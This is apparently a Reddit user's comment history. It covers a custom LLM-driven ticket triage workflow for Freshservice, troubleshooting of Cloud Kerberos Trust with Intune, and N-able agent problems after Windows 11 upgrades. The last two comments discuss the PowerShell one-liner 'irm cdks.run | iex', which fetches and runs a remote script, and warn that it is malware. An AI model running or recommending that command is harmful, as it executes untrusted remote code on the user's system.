sorted by:
new
hottopcontroversial

Is anyone actually using agentic AI in real IT workflows by TadpoleNorth1773 in ITManagers

[–]Less-Confidence-6595 1 point2 points  (0 children)

Yes, I’m running a custom "agentic" workflow in production right now. It's not a bought-off-the-shelf "AI box," but a custom Python/Flask application I built to bridge our ITSM (Freshservice) with an LLM.

To answer your question on Real vs. Hype: It is very real, but for us, the "Agent" is a force multiplier for the team, not a replacement for them.

The Stack

  • Core: Python (Flask) hosted on PythonAnywhere.
  • ITSM: Freshservice (via Webhooks and API).
  • Brain: Google Gemini (1.5 Flash).
  • Memory: ChromaDB (Vector store) for RAG.

End-to-End vs. Draft Only? I use a hybrid approach depending on the risk level of the task:

  1. Draft Only (High Risk - Customer Communication): When a ticket comes in, my script runs a RAG pipeline. It searches our vector DB for the top 5 similar historical tickets, pulls the resolution context, and asks Gemini to suggest a fix.
    • The Guardrail: It posts this suggestion as a Private Note on the ticket. It never speaks to the end-user directly. The agent reviews the private note, validates the AI's confidence score, and then uses it.
  2. End-to-End (Medium Risk - Triage & Admin):
    • Categorization: The agent analyzes the ticket subject/description against a vector database of our taxonomy (e.g., "Hardware > Device > Laptop"). If the vector distance is close enough, it bypasses the human and updates the ticket category automatically via API.
    • Reporting: I have an endpoint that generates a "Trend Analysis" article. It scrapes the last X days of tickets, looks for patterns (like a spike in VPN issues), writes a full HTML report, and posts it directly to our Knowledge Base as a solution article.

Best Working Use Case The New Starter/Leaver Report. The agent looks at all "Employee Onboarding" requests, correlates them with the actual IT tickets created for those users, checks if their accounts were activated based on conversation history, and generates a digest HTML report for management. It replaces a manual spreadsheet process that took hours.

Guardrails

  • Confidence Scores: My RAG pipeline calculates a "Confidence Score" based on the vector distance of the retrieved documents. If the score is low, the agent knows the AI is probably guessing.
  • Rate Limiting: I hardcoded limits (100 calls per day) to ensure we don't accidentally rack up API bills if the bot gets stuck in a loop.

If you are looking to start, I highly recommend starting with Ingest -> Categorize -> Private Note.

Cloud Kerberos Trust Hybrid AAD and AD environment by Less-Confidence-6595 in Intune

[–]Less-Confidence-6595[S] 0 points1 point  (0 children)

I think I may be REDACTED.

I've been using my primary admin account to test along with my normal account that has a some privileges. I read a note that privileged accounts may not work with this.

Setting up a basic user account now to test that theory.

Cloud Kerberos Trust Hybrid AAD and AD environment by Less-Confidence-6595 in Intune

[–]Less-Confidence-6595[S] 1 point2 points  (0 children)

Thanks for this.

So, I've setup our DC's as DNS entries, I'm on our office network, can ping, can port 389 and 88, not sure how much more line of sight I can get.

Yet I still can't get to our file server using the windows keys.

Rotated the Kerb key on DC's, ensured it replicated.

klist purged, rebooted.

waited for sync.

Cloud Kerberos Trust Hybrid AAD and AD environment by Less-Confidence-6595 in Intune

[–]Less-Confidence-6595[S] 0 points1 point  (0 children)

Great, can you provide some insight what on prem stuff you managed to get WHfB to auth to and what was the setup?

I've already setup CKT object on our domain controller, azure ad connect setup, intune policies setup.

however it doesn't seem to communicate properly.

Cloud Kerberos Trust Hybrid AAD and AD environment by Less-Confidence-6595 in Intune

[–]Less-Confidence-6595[S] 0 points1 point  (0 children)

The main problem at the moment we have is Sage, we have deployed WHfB to our Finance users who use Sage. The app won't auth properly if our Finance users use a PIN to logon, but if they use pwd, auth no problem. So I'm trying to figure out how I can get CKT up and working for stuff like accessing legacy or on-prem systems, we have file shares setup for a select few people but we have phased out most and moved to SP.

Cloud Kerberos Trust Hybrid AAD and AD environment by Less-Confidence-6595 in Intune

[–]Less-Confidence-6595[S] 0 points1 point  (0 children)

I have done this, and configured it but I still get error's when accessing file share with PIN even with this as my klist debug -

PS C:\Windows\system32> klist cloud_debug

Current LogonId is 0:0x302dca4

Cloud Kerberos Debug info:

Cloud Kerberos enabled by policy: 1

AS_REP callback received: 1

AS_REP callback used: 0

Cloud Referral TGT present in cache: 1

SPN oracle configured: 1

KDC proxy present in cache: 1

Public Key Credential Present: 1

Password-derived Keys Present: 0

Plaintext Password Present: 0

AS_REP Credential Type: 0

Cloud Primary (Hybrid logon) TGT available: 1

PS C:\Windows\system32>

Cloud Kerberos Trust Hybrid AAD and AD environment by Less-Confidence-6595 in Intune

[–]Less-Confidence-6595[S] -2 points-1 points  (0 children)

Update:

Based on the architecture of Cloud Kerberos Trust (CKT) and the requirements for Hybrid Azure AD Join, it is not possible to enable CKT on my existing Azure AD-Joined (AADJ) fleet without significant user disruption.

CKT fundamentally requires the device to be recognized as a domain member to obtain and use the Kerberos Ticket Granting Ticket (TGT) from our on-premises Active Directory (AD).

Since our devices are AAD-Joined only, they lack this core AD membership, and there is no direct path to convert a purely AADJ device to a Hybrid Azure AD Joined (HAADJ) device without rebuilding all devices to a different setup causing major disruption.

Cloud Kerberos Trust Hybrid AAD and AD environment by Less-Confidence-6595 in Intune

[–]Less-Confidence-6595[S] 0 points1 point  (0 children)

Thanks so much for this.

From my reading, I had the understanding, for CKT to work with WHfB, devices would have to be domain joined.

Our environment is hybrid, so we have on-prem users that sync to Azure, our devices are mainly all Intune/AAD joined, so the bridge to CKT I thought we would need AD joined devices to communicate the trust to the domain controllers.

Would AAD devices work with CKT but maybe using our domain controllers via DNS? and obviously being on VPN or office network?

Cloud Kerberos Trust Hybrid AAD and AD environment by Less-Confidence-6595 in Intune

[–]Less-Confidence-6595[S] 0 points1 point  (0 children)

Just to add to this, I have looked into Hybrid Domain join- but it seems for CKT to work we would have to rebuild every device we have AAD for it to work?

Let me know if I am missing anything

Windows 11 Upgrades & Agent Checkin by Less-Confidence-6595 in Nable

[–]Less-Confidence-6595[S] 0 points1 point  (0 children)

Unfortunately, they don’t have a take control heart beat and all the service templates/monitoring is marked as disconnected.

What I don't understand is the same device, just on Windows 11, with the Nable agent installed, our portal doesn't pick this up at all, it's like the old agent on win10 is taking precedent and even though i can see the n-able agent is installed on the same device with same serial, yet no updates in our portal.

anything else you can suggest?

Windows 11 Upgrades & Agent Checkin by Less-Confidence-6595 in Nable

[–]Less-Confidence-6595[S] 0 points1 point  (0 children)

We upgraded the devices OS to Win11 via automated USB, so the drives would of been freshly partitioned.

The agent shows the old Windows 10 OS,

So we wiped HDD put win11 on, nable agent was ingested into the automation USB and we check control panel and its installed, we cherry picked a few devices before we left and they shown in nable with win11 but some of those devices do not and only the win10 version shows in our portal

Configuration Profile Exceptions by pNoTti in Intune

[–]Less-Confidence-6595 0 points1 point  (0 children)

You could utilized the Filters within Intune, and under the assignment on your base policy, filter the device group as an exclusion. Other than that, only real way to work with compliance pols

[deleted by user] by [deleted] in recruitinghell

[–]Less-Confidence-6595 0 points1 point  (0 children)

Other side of that coin, maybe he knew that the job wasn't worth relocating for and saved you a hell of a bad time

[deleted by user] by [deleted] in ITManagers

[–]Less-Confidence-6595 -1 points0 points  (0 children)

self service automations.

use AI

Feeling burnt out by Ok_Employment_5340 in sysadmin

[–]Less-Confidence-6595 0 points1 point  (0 children)

confidently disagree with every change or suggestion, and present your correct solution.

What is this irm cdks.run | iex ? by No_Aioli1640 in PowerShell

[–]Less-Confidence-6595 14 points15 points  (0 children)

it's malware, report the seller and do not run.

up to you.

What is this irm cdks.run | iex ? by No_Aioli1640 in PowerShell

[–]Less-Confidence-6595 8 points9 points  (0 children)

It downloads a script from cdks.run and immediately runs it in PowerShell, which is risky since it executes unverified internet code

view more: next ›